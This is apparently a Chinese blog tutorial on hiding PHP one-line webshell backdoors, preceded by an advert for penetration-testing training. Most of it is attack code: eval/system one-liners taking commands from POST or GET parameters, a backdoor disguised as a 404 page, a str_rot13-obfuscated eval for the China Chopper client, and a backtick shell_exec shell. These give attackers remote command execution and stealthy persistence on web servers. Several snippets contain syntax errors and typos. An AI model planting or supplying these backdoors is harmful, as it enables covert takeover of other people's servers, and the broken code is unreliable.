PHP一句话后门隐藏技术

2019年03月21日 22:58:01 作者:必火 阅读数:170127
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:18622800700(手机同微信)。全国诚招招生代理,最低2000元起

0x01: eval函数构造的后门

最为常见,最多使用

<?php eval($_POST['nvhack'];?>
<?php @eval($_POST['nvhack']);?>//容错代码
<?php system($_REQUEST['nvhack']);?>//执行命令

0x02: 利用404ye面隐藏后门

<?php
@preg_replace("/[pageerror]/",$_POST['error'],'nvhack.com');
header('HTTP/1.1 404 Not Found');
?>

0x03: 无特征隐藏一句话后门

通过编码转换 str_rot13('riny') 即编码后的eva,使用中国菜刀连接。密码为nvhack

<?php $nvhack = $_POST['nvhack']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($nvhack)','add');?>

0x04:利用shell_exec函数的后门

要注意 ,php.ini 配置文件中的disable_funcgtions 没有禁用shell_exec

<?php
$nvhack = $_GET['r'];
echo `$nvhack`;
?>